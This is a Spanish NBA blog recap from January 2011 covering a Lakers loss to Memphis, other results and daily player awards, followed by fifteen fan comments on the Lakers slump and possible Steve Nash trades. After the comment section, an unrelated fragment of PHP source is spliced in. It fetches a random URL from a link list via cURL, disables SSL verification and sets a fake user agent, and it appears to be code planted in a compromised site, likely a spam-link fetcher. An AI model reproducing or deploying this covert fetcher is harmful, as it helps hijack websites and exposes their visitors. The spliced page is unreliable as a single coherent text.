La Crónica (02/01/2011)

03 de January de 2011 por txusma

Los aficionados del Staples Center están empezando a mosquearse con su equipo y anoche se lo hicieron saber abandonando las gradas en masa antes de tiempo o abucheándoles cuando perdían por 26 puntos de diferencia en el último cuarto. Los Lakers no se enfrentaban a un equipo de nivel como los Spurs o los Celtics, por ejemplo, sinó que jugaban contra un equipo que días antes había perdido contra el peor equipo de la liga. Los Grizzlies se pasearon desde el minuto uno venciendo en todos y cada uno de los cuartos a unos Lakers en los que no podríamos salvar a ningún jugador (104-85). Tal vez sea momento de analizar el porqué de esta situación aunque conociendo a Phil Jackson seguro que dejará que sus jugadores se den cuenta por sí solos. Por su bien, esperemos que no sea demasiado tarde.

Dallas y Boston, en cambio, mostraron una cara completamente diferente y vencieron sus partidos a pesar de las importantes ausencias. Caron Butler estará 2 meses de baja en lo que supone un mazazo importante para el equipo pero que al menos no provocará que se pierda los Playoffs. Anoche, los Mavs vencieron a los Cavaliers de la mano de Shawn Marion y DeShawn Stevenson (104-95). En los Celtics, volvió Rondo pero continúan sin Garnett. De todas maneras, Toronto no fue rival en ningún momento (93-79). DeRozan anotó más de 25 puntos por segundo partido consecutivo.

En el Este también vencieron Atlanta a los Clippers (107-98, a pesar de una nueva brutal actuación de Griffin) y New York a los Pacers (92-98), así que el sexteto de cabeza queda aún mejor definido.

En el Oeste, victoria de los Blazers sobre los Rockets (85-100) en la lucha por la octava plaza de la conferencia y de los Kings sobre los Suns (89-94). Demarcus Cousins hizo y deshizo a su antojo en la zona de Phoenix. Lo que le sobra de talento le falta de cabeza.

PREMIOS

MVP: Josh Smith protagonizó la remontada de los Hawks con 22 puntos, 10 rebotes, 3 robos y 2 tapones. LaMarcus Aldridge se comió a Scola marcandose un 25-11. DeMarcus Cousins despertó del todo y nos regaló 28 puntos, 8 rebotes y 6 asistencias. Todos ellos lo merecen, pero el premio recae en Paul Pierce, 30 puntos, 7 rebotes, 4 asistencias, 10 de 15 en tiros de campo y 3 de 3 en triples, tirando del equipo como hacen los grandes.

ROY: A pesar del mejor partido de la carrera de Cousins, el premio es un día mas para Blake Griffin que nuevamente se fue a números de MVP de la jornada, 31 puntos, 15 rebotes y 3 asistencias.

Sorpresa: Hacía tiempo que no veíamos al auténtico Antawn Jamison. Anoche apareció con 35 puntos y 10 rebotes en el mismo sitio y a la misma hora que un tio igualito a Ramon Sessions que se cascó 19 puntos, 7 rebotes y 12 asistencias, y ambos perdieron.

Decepción: Ron Artest disputó 24 minutos y tuvo una aportación de 0 puntos, 1 rebote, 2 asistencias y 3 pérdidas. Nunca le hemos exigido números, pero esto es demasiado, sin dejar de lado que su equipo es posiblemente la decepción de las últimas semanas.

Mayor esfuerzo en vano: Repite premio Blake Griffin, seguido de cerca por la estraña pareja de los Cavs, Jamison&Sessions.

Comenta

15 comentarios a esta entrada

  1. TheAnswer dice:
    #1

    Nunca debieron traspasar a Sasha…

      Citar

  2. Busky23 dice:
    #2

    Me parece bastante lamentable la imagen que están ofreciendo los Lakers,indigna de un campeón,dejandose vapulear y desapareciendo del partido varios de sus jugadores.
    Alguien debería de dar a esta plantilla un toque serio de atención. Lo de esta noche en el Staples ha sido de vergüenza,ya se encuentran a 7 partidos de los Spurs,en un Oeste donde supuestamente  se iban a “pasear” Ja ja,aquí nadie regala nada y como no se pongan las pilas les van a seguir pasando la mano por la cara. 
    En todas las temporadas han tenido sus momentos de dejarse llevar pero esta temporada se están pasando de la raya.

    Ayer vi a los Clippers como dejaban escapar un partido que tenían controlado,ataques sin ton ni son,perdidas de pelota,triples precipitados…los últimos 6 minutos los jugaron en modo “pardillo”.
    Josh Smith y sobretodo Crawford los acabaron de matar.
    Deberían analizar y aprender de esta derrota de cara al futuro.

    Phoenix pinta mal,aunque Nash volvió ayer a rozar la perfección,ojalá salga de allí y encuentre la oportunidad que se merece.

    Saludos y feliz año a todos.

      Citar

  3. Ru dice:
    #3

    Los Suns van en picado…..pobre Nash y pobre Hill.Un traspaso con Portland de por medio sería muy interesante (Andre Miller + Oden por Nash),gran base para Blazers,que les sume un punto a sus aspiraciones(Aldridge-Nash….sería una grandísima dupla)y salary cap para Suns,que tiene que reconstruir.

      Citar

  4. KB # 24 dice:
    #4

    Espero que los lakers aprendan la lección de estas últimas semanas…
    La única esperanza que tengo es la de saber que cuando más viejo es un equipo menos importa la temporada regular (pero claro, la ventaja campo siempre ayuda, no?)

      Citar

  5. GreenPride dice:
    #5

    Creo que los Lakers tienen una gran pajara por su autocomplacencia. Deben de reaccionar cuanto antes o perderan definitivamente la ventaja campo para las eliminatorias importantes contra Spurs, Mavs, Celtics o Heat y es algo muy importante. ¿Alguien duda que la final del año pasado pudiera haber cambiado de signo de jugarse el 7º en Boston? La ventaja campo en eliminatorias igualadas es muy importante aunque no decisiva y parece que los Lakers están yendo demasiado sobrados. Una vez dicho esto, creo que acabarán reaccionando aunque no sé si les dará para coger la ventaja de campo.
    Los Celtics ganaron a los Raptors al tran tran con Rondo claramente lejos de su mejor momento y gracias al duo Pierce&Allen. Sin embargo creo que este mes sufrirán bastante ya que con las lesiones andan cortos de banquillo y tienen un mes cargadísimo con 16 partidos nada menos, veremos si no les adelantan los Heat que parecen ir como tiros

      Citar

  6. Denise dice:
    #6

    3-4 para Lakers desde el traspaso de Vujacic, no sé como pudieron traspasar a ese buen hombre, si era pieza clave en el sistema de ataque angelino…XD
    Ahora nadie se atreve a criticar al bueno de McMillan? Temporadón el de los Blazers teniendo en cuenta las lesiones de sus dos centers y la de su jugador franquicia, Brandon Roy.
    Pobre Nash…, por qué? Particularmente es un jugador que me encanta, pero hace dos años creo, era agente libre y decidió renovar por unos cuantos kilos (como hacen la mayoría) en vez de irse a un equipo ganador a costa de bajarse su caché. No tendrá el caandiense tantas ganas de anillos, porque el proyecto de los Suns se veía desde hace tiempo que se iba a pique. Si no ganaron la NBA en los priemros años de D’Antoni, no lo iban a ganar después con este modelo y con peores jugadores.

      Citar

  7. Txusma dice:
    #7

    Cuando Nash renovó creo que Amare todavía estaba por allí y a lo mejor el canadiense jugársela con su pareja de los últimos años. No contaba con que al año siguiente Amare le abandonaría y no precisamente por un proyecto ganador.
    Yo no veo tan fácil un traspaso para Nash pero sobretodo pq habría que ver a que franquicia podría ir. Nash es posiblemente el mejor base de la NBA pero marca completamente la forma de jugar del equipo. Meter a Nash en los Blazers les haría mejorar? No lo tengo tan claro. El estilo de Nash le iría a Lamarcus? No sé, no sé… Un experimento de este calibre a mitad de temporada no me da toda la confianza del mundo.

      Citar

  8. Denise dice:
    #8

    Puestos a ubicar a Nash en otro destino, de entre los equipos ganadores, creo que su mejor opción seria Oklahoma City Thunder, desplazando a Westbrook al puesto de escolta (pienso que son compatibles) o saliendo este último como sexto hombre.
    Cabría la posibilidad de hacer dos traspasos en los que tanto Oklahoma como Phoenix saldrían ganando, en mi opinión:
    1- Nash + algún paquetillo por Krstic y Peterson (ambos acaban contrato este año,), por lo que Phoenix conseguría 12 kilos libres para fichar el año que viene o reconstruir pero con un limite salarial bajo.
    2- Nash por Collison, que aunque parezca mentira cobra nada más y nada menos que 13 kilos, pero que a partir del año que viene tiene un contrato de 3 kilos, con lo que Suns ahorrarían 10 kilos cara al año que viene.

      Citar

  9. Viva_Dirk dice:
    #9

    Hombre Denise, cambiar a Nash por mierda que acaba co no parece muy buena idea, en caso de que los Suns se planteen su traspaso supongo que buscarian un jugador emergente como mínimo, si hablamos de Oklahoma que menos que Green+Maynor, por no hablar de Westbrook. Alguien que tendria cosas que dar es Dallas, jeje, desde luego no quiero ver a Nash jugando a ritmo de McMillan. Tiene toda la pinta de que no se moverá.

      Citar

  10. Denise dice:
    #10

    Hombre, en estos tiempos que corren no está nada mal liberar 10 milloncetes, de todas formas, con Nash, o con mierda (como tu dices), con jugador emergente o lo que sea, los Suns a corto plazo no se van a comer un colín, por tanto, lo mejor que pueden hacer es pagar lo menos posible. Porque pagar millonadas a jugadores por muy buenos que sean para no entrar en playoffs, es tontería.

      Citar

  11. Viva_Dirk dice:
    #11

    Eso no es del todo así, tener buenos jugadores repercute directamente en los ingresos de la franquicia, Nash cobra ahora mismo 10.3 millones y el año que viene no llegará a 12, y Phoenix al acabar la temporada estará por debajo del límite salarial con opciones de fichar un agente libre de otros 10 millones mas o menos. Y si no entran en play-offs tendrán una elección de loteria en el draft.

    De traspasar a Nash deben hacerlo por algo atractivo y que a la vez les de posibilidades salariales, algo con Memphis sería viable y no tengo dudas de que Nash pondria a Memphis a un gran nivel, Conley+Mayo podria valer para ambos.

      Citar

  12. TheDeerHunter dice:
    #12

    Manda huevos, Denise, que menciones la lesión de Przybilla como un factor clave de estos Blazers, incluso la de Oden que nunca ha estado.
    Aún tiene más guasa que señales a McMallon como el salvador cuando va 8º de conferencia (y no me jugaría los cuartos a que mantiene la plaza al final de conferencia) y le están salvando los muebles gente que hace nada apenas sabía ni que existían. Es más, si hubiera alguna posibilidad de que Roy volviera sano pronto pasaría página. Vieja historia del viejo zorro…

    Para mí la única prueba irrefutable es que siempre ha tenido una plantilla mucho mejor de lo que él propone, mucho mejor que para hacer “balones a Roy” y juego cansino. La suerte que tiene es que las lesiones son su eterna excusa que luego el plantillón que le montó Pritchard oculta su incapacidad, porque brilla más en función de que tenga menos opciones donde elegir (y donde equivocarse)

    El año pasado cuando dispuso de todo su plantilla al completo no funcionó inmensamente mejor que éste. No sería difícil de averiguar.

      Citar

  13. Denise dice:
    #13

    Si las lesiones de Przybilla, Oden y Roy no merman la calidad de este equipo…..igualito el jugar con estos tres jugadores sanos, que con Mills, Cunningham o Sean marks.
    Yo tampoco creo que Blazers (si se confirma las malas noticias sobre Roy) pueda mantenerse en la octava plaza de playoffs, pero te parece poco meritorio teniendo en cuenta las lesiones y lo salvaje que es el Oeste, tened a Portland metido octavo superando a mejores equipos como Memphis o Houston, superando el 50% de victorias y con un 12-3 en casa (hasta Mavs, Heat o lakers han perdido más)?
    Total, siempre la misma historia, cuando Blazers pierda 5 partidos seguidos la culpa será de McMallon (como le llamas), pero cuando tenga una racha positiva de victorias, será gracias a Matthews,a Rudy o al utillero ..

      Citar

  14. Viva_Dirk dice:
    #14

    Bueno Denise, lo que se argumenta contra McMillan es que hace lo mismo con lo que tiene ahora que con todos sanos, de hecho con todos sanos no le saca el mas mínimo partido a jugadores buenos que estan demostrando ahora lo que pueden aportar al equipo.

    Es claramente insuficiente para un equipo aspirante.

      Citar

  15. TheDeerHunter dice:
    #15

    Ojo Denise… que debes admitir que he intentado no hacer sangre con el tema tanto en las crónicas como en los comentarios. Obviamente considero que la baja de Roy es irreemplazable para la franquicia pero Oden nunca ha estado y Przybilla no sólo que siempre ha tenido tendencia a lesionarse sino que su producción tampoco ha sido nunca decisiva.
    Supongo que sobre los méritos nunca nos pondremos de acuerdo pero lo que no puede ser es que si te tapas la cabeza se te destapen los pies. Si juega Roy hasta Aldridge parece regulero… y no te digo ya otros miembros y ex-miembros de la plantilla. No creo que sea culpa de Roy… y si lo es también sería indirectamente del técnico. Cada año se demuestra que en ese club hay una evidente falta de gestión de la plantilla porque luego las lesiones destapan la calidad de los “desheredados”.
    Es irónico que todos estos años lo que realmente le está salvando la cabeza a McMillan es la profundidad de un plantillón que le construyó su más cruel víctima y enemigo. O igual quieres decirme cuánto de todo esto (y de lo pasado) tiene mérito Kevin Pritchard.

    Ahora… que tantas dudas que se han vertido sobre la profesionalidad de Rudy ahí la tenéis. Que si yo fuera él se iba a arremangar a salvar el cuello del jefe “SPM”. Para lo que le queda en el convento…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>